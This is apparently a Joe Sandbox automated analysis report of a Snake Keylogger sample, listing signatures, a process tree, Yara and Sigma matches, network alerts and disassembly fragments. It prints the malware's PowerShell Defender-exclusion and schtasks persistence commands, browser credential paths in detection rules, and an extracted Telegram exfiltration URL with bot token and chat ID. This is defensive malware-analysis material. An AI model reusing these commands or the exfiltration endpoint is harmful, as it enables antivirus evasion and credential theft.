Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hcy2SdW2z6.exe

Overview

General Information

Sample name:hcy2SdW2z6.exe
renamed because original name is a hash value
Original sample name:fa5584ac7257747136c877bd58182430e2d23d5c6b4eff9ab240fcaefe526ee5.exe
Analysis ID:1634875
MD5:0cd8e4dd97ae7994490cbf435272c182
SHA1:1206bbeff9be5a99ab8202acc8ccf93dafa1d269
SHA256:fa5584ac7257747136c877bd58182430e2d23d5c6b4eff9ab240fcaefe526ee5
Tags:exeSnakeKeyloggeruser-adrian__luca
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected Snake Keylogger
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • hcy2SdW2z6.exe (PID: 7704 cmdline: "C:\Users\user\Desktop\hcy2SdW2z6.exe" MD5: 0CD8E4DD97AE7994490CBF435272C182)
    • powershell.exe (PID: 7812 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hcy2SdW2z6.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7536 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7868 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zZlsXaceOG.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7892 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zZlsXaceOG" /XML "C:\Users\user\AppData\Local\Temp\tmpDE83.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • hcy2SdW2z6.exe (PID: 8176 cmdline: "C:\Users\user\Desktop\hcy2SdW2z6.exe" MD5: 0CD8E4DD97AE7994490CBF435272C182)
  • svchost.exe (PID: 8068 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • zZlsXaceOG.exe (PID: 7440 cmdline: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe MD5: 0CD8E4DD97AE7994490CBF435272C182)
    • schtasks.exe (PID: 4688 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zZlsXaceOG" /XML "C:\Users\user\AppData\Local\Temp\tmpEF6B.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 2424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • zZlsXaceOG.exe (PID: 504 cmdline: "C:\Users\user\AppData\Roaming\zZlsXaceOG.exe" MD5: 0CD8E4DD97AE7994490CBF435272C182)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot5227573794:AAECZBnQSxLs0aOVsV2wnclC6-WKnxPpi_k/sendMessage?chat_id=5217421430", "Token": "5227573794:AAECZBnQSxLs0aOVsV2wnclC6-WKnxPpi_k", "Chat_id": "5217421430", "Version": "5.1"}
SourceRuleDescriptionAuthorStrings
00000008.00000002.3639199357.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
  • 0x14885:$a1: get_encryptedPassword
  • 0x14b71:$a2: get_encryptedUsername
  • 0x14691:$a3: get_timePasswordChanged
  • 0x1478c:$a4: get_passwordField
  • 0x1489b:$a5: set_encryptedPassword
  • 0x15eeb:$a7: get_logins
  • 0x15e4e:$a10: KeyLoggerEventArgs
  • 0x15ab9:$a11: KeyLoggerEventArgsEventHandler
0000000D.00000002.3639123759.0000000000418000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    0000000D.00000002.3639123759.0000000000418000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      0000000D.00000002.3639123759.0000000000418000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
      • 0x38d8:$x1: $%SMTPDV$
      • 0x22bc:$x2: $#TheHashHere%&
      • 0x3880:$x3: %FTPDV$
      • 0x225c:$x4: $%TelegramDv$
      • 0x38a4:$m2: Clipboard Logs ID
      • 0x3ae2:$m2: Screenshot Logs ID
      • 0x3bf2:$m2: keystroke Logs ID
      • 0x3ecc:$m3: SnakePW
      • 0x3aba:$m4: \SnakeKeylogger\
      00000009.00000002.1277566601.00000000044F1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Click to see the 27 entries
        SourceRuleDescriptionAuthorStrings
        9.2.zZlsXaceOG.exe.4511d18.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          9.2.zZlsXaceOG.exe.4511d18.1.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
            9.2.zZlsXaceOG.exe.4511d18.1.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
            • 0x12c85:$a1: get_encryptedPassword
            • 0x12f71:$a2: get_encryptedUsername
            • 0x12a91:$a3: get_timePasswordChanged
            • 0x12b8c:$a4: get_passwordField
            • 0x12c9b:$a5: set_encryptedPassword
            • 0x142eb:$a7: get_logins
            • 0x1424e:$a10: KeyLoggerEventArgs
            • 0x13eb9:$a11: KeyLoggerEventArgsEventHandler
            9.2.zZlsXaceOG.exe.4511d18.1.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
            • 0x1a68e:$a2: \Comodo\Dragon\User Data\Default\Login Data
            • 0x198c0:$a3: \Google\Chrome\User Data\Default\Login Data
            • 0x19cf3:$a4: \Orbitum\User Data\Default\Login Data
            • 0x1ad32:$a5: \Kometa\User Data\Default\Login Data
            9.2.zZlsXaceOG.exe.4511d18.1.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
            • 0x13869:$s1: UnHook
            • 0x13870:$s2: SetHook
            • 0x13878:$s3: CallNextHook
            • 0x13885:$s4: _hook
            Click to see the 47 entries

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hcy2SdW2z6.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hcy2SdW2z6.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\hcy2SdW2z6.exe", ParentImage: C:\Users\user\Desktop\hcy2SdW2z6.exe, ParentProcessId: 7704, ParentProcessName: hcy2SdW2z6.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hcy2SdW2z6.exe", ProcessId: 7812, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hcy2SdW2z6.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hcy2SdW2z6.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\hcy2SdW2z6.exe", ParentImage: C:\Users\user\Desktop\hcy2SdW2z6.exe, ParentProcessId: 7704, ParentProcessName: hcy2SdW2z6.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hcy2SdW2z6.exe", ProcessId: 7812, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zZlsXaceOG" /XML "C:\Users\user\AppData\Local\Temp\tmpEF6B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zZlsXaceOG" /XML "C:\Users\user\AppData\Local\Temp\tmpEF6B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe, ParentImage: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe, ParentProcessId: 7440, ParentProcessName: zZlsXaceOG.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zZlsXaceOG" /XML "C:\Users\user\AppData\Local\Temp\tmpEF6B.tmp", ProcessId: 4688, ProcessName: schtasks.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zZlsXaceOG" /XML "C:\Users\user\AppData\Local\Temp\tmpDE83.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zZlsXaceOG" /XML "C:\Users\user\AppData\Local\Temp\tmpDE83.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\hcy2SdW2z6.exe", ParentImage: C:\Users\user\Desktop\hcy2SdW2z6.exe, ParentProcessId: 7704, ParentProcessName: hcy2SdW2z6.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zZlsXaceOG" /XML "C:\Users\user\AppData\Local\Temp\tmpDE83.tmp", ProcessId: 7892, ProcessName: schtasks.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hcy2SdW2z6.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hcy2SdW2z6.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\hcy2SdW2z6.exe", ParentImage: C:\Users\user\Desktop\hcy2SdW2z6.exe, ParentProcessId: 7704, ParentProcessName: hcy2SdW2z6.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hcy2SdW2z6.exe", ProcessId: 7812, ProcessName: powershell.exe
            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8068, ProcessName: svchost.exe

            Persistence and Installation Behavior

            barindex
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zZlsXaceOG" /XML "C:\Users\user\AppData\Local\Temp\tmpDE83.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zZlsXaceOG" /XML "C:\Users\user\AppData\Local\Temp\tmpDE83.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\hcy2SdW2z6.exe", ParentImage: C:\Users\user\Desktop\hcy2SdW2z6.exe, ParentProcessId: 7704, ParentProcessName: hcy2SdW2z6.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zZlsXaceOG" /XML "C:\Users\user\AppData\Local\Temp\tmpDE83.tmp", ProcessId: 7892, ProcessName: schtasks.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-11T06:07:32.805327+010028033053Unknown Traffic192.168.2.449717104.21.96.1443TCP
            2025-03-11T06:07:35.532292+010028033053Unknown Traffic192.168.2.449721104.21.96.1443TCP
            2025-03-11T06:07:35.691901+010028033053Unknown Traffic192.168.2.449722104.21.96.1443TCP
            2025-03-11T06:07:38.643471+010028033053Unknown Traffic192.168.2.449726104.21.96.1443TCP
            2025-03-11T06:07:38.655170+010028033053Unknown Traffic192.168.2.449728104.21.96.1443TCP
            2025-03-11T06:07:42.619051+010028033053Unknown Traffic192.168.2.449736104.21.96.1443TCP
            2025-03-11T06:07:45.435603+010028033053Unknown Traffic192.168.2.449740104.21.96.1443TCP
            2025-03-11T06:07:51.351386+010028033053Unknown Traffic192.168.2.449748104.21.96.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-11T06:07:27.049790+010028032742Potentially Bad Traffic192.168.2.449710193.122.6.16880TCP
            2025-03-11T06:07:30.858399+010028032742Potentially Bad Traffic192.168.2.449710193.122.6.16880TCP
            2025-03-11T06:07:30.893571+010028032742Potentially Bad Traffic192.168.2.449715193.122.6.16880TCP
            2025-03-11T06:07:33.378022+010028032742Potentially Bad Traffic192.168.2.449715193.122.6.16880TCP
            2025-03-11T06:07:33.534211+010028032742Potentially Bad Traffic192.168.2.449719193.122.6.16880TCP
            2025-03-11T06:07:36.248371+010028032742Potentially Bad Traffic192.168.2.449724193.122.6.16880TCP
            2025-03-11T06:07:36.393587+010028032742Potentially Bad Traffic192.168.2.449725193.122.6.16880TCP
            2025-03-11T06:07:39.393640+010028032742Potentially Bad Traffic192.168.2.449734193.122.6.16880TCP
            2025-03-11T06:07:42.252973+010028032742Potentially Bad Traffic192.168.2.449737193.122.6.16880TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: hcy2SdW2z6.exeAvira: detected
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeAvira: detection malicious, Label: TR/AD.SnakeStealer.cpdev
            Source: 0000000D.00000002.3644075067.00000000028C1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot5227573794:AAECZBnQSxLs0aOVsV2wnclC6-WKnxPpi_k/sendMessage?chat_id=5217421430", "Token": "5227573794:AAECZBnQSxLs0aOVsV2wnclC6-WKnxPpi_k", "Chat_id": "5217421430", "Version": "5.1"}
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeReversingLabs: Detection: 55%
            Source: hcy2SdW2z6.exeVirustotal: Detection: 65%Perma Link
            Source: hcy2SdW2z6.exeReversingLabs: Detection: 55%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: 0.2.hcy2SdW2z6.exe.4a31688.1.raw.unpackString decryptor:
            Source: 0.2.hcy2SdW2z6.exe.4a31688.1.raw.unpackString decryptor: 5227573794:AAECZBnQSxLs0aOVsV2wnclC6-WKnxPpi_k
            Source: 0.2.hcy2SdW2z6.exe.4a31688.1.raw.unpackString decryptor: 5217421430
            Source: 0.2.hcy2SdW2z6.exe.4a31688.1.raw.unpackString decryptor:
            Source: 0.2.hcy2SdW2z6.exe.4a31688.1.raw.unpackString decryptor: 5227573794:AAECZBnQSxLs0aOVsV2wnclC6-WKnxPpi_k
            Source: 0.2.hcy2SdW2z6.exe.4a31688.1.raw.unpackString decryptor: 5217421430

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: hcy2SdW2z6.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49713 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49718 version: TLS 1.0
            Source: hcy2SdW2z6.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 07D7F31Ah0_2_07D7E98D
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 0125F1F6h8_2_0125F007
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 0125FB80h8_2_0125F007
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_0125E528
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_0125EB5B
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_0125ED3C
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A11A38h8_2_06A11620
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A102F1h8_2_06A10040
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A11471h8_2_06A111C0
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A1CD49h8_2_06A1CAA0
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A1D1A1h8_2_06A1CEF8
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A1F8B9h8_2_06A1F610
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A11A38h8_2_06A11A13
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A1FD11h8_2_06A1FA68
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A1C8F1h8_2_06A1C648
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A1DA51h8_2_06A1D7A8
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A1D5F9h8_2_06A1D350
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A10751h8_2_06A104A0
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A1E759h8_2_06A1E4B0
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A1B791h8_2_06A1B4E8
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A1DEA9h8_2_06A1DC00
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A1E301h8_2_06A1E058
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A1F461h8_2_06A1F1B8
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A1C041h8_2_06A1BD98
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A1C499h8_2_06A1C1F0
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A10BB1h8_2_06A10900
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A1EBB1h8_2_06A1E908
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A11011h8_2_06A10D60
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A1F009h8_2_06A1ED60
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A11A38h8_2_06A11966
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A1BBE9h8_2_06A1B940
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A48945h8_2_06A48608
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_06A436CE
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A46171h8_2_06A45EC8
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A458C1h8_2_06A45618
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A45D19h8_2_06A45A70
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_06A433A8
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_06A433B8
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A46E79h8_2_06A46BD0
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A465C9h8_2_06A46320
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A46A21h8_2_06A46778
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A47751h8_2_06A474A8
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A40741h8_2_06A40498
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A40B99h8_2_06A408F0
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A402E9h8_2_06A40040
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A472FAh8_2_06A47050
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A48459h8_2_06A481B0
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A45441h8_2_06A45198
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A47BA9h8_2_06A47900
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A40FF1h8_2_06A40D48
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 4x nop then jmp 06A48001h8_2_06A47D58
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 07B4E602h9_2_07B4DC75
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 00F2F1F6h13_2_00F2F007
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 00F2FB80h13_2_00F2F007
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h13_2_00F2E528
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 04EF02F1h13_2_04EF0040
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 04EF1471h13_2_04EF11C0
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 04EF1A38h13_2_04EF1620
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 04EFB791h13_2_04EFB4E8
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 04EF0751h13_2_04EF04A0
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 04EFE759h13_2_04EFE4B0
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 04EFE301h13_2_04EFE058
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 04EFDEA9h13_2_04EFDC00
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 04EFC499h13_2_04EFC1F0
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 04EFF461h13_2_04EFF1B8
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 04EFC041h13_2_04EFBD98
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 04EF1A38h13_2_04EF1966
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 04EF1011h13_2_04EF0D60
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 04EFF009h13_2_04EFED60
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 04EFBBE9h13_2_04EFB940
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 04EFEBB1h13_2_04EFE908
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 04EF0BB1h13_2_04EF0900
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 04EFD1A1h13_2_04EFCEF8
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 04EFCD49h13_2_04EFCAA0
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 04EFFD11h13_2_04EFFA68
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 04EFC8F1h13_2_04EFC648
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 04EFF8B9h13_2_04EFF610
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 4x nop then jmp 04EFDA51h13_2_04EFD7A8
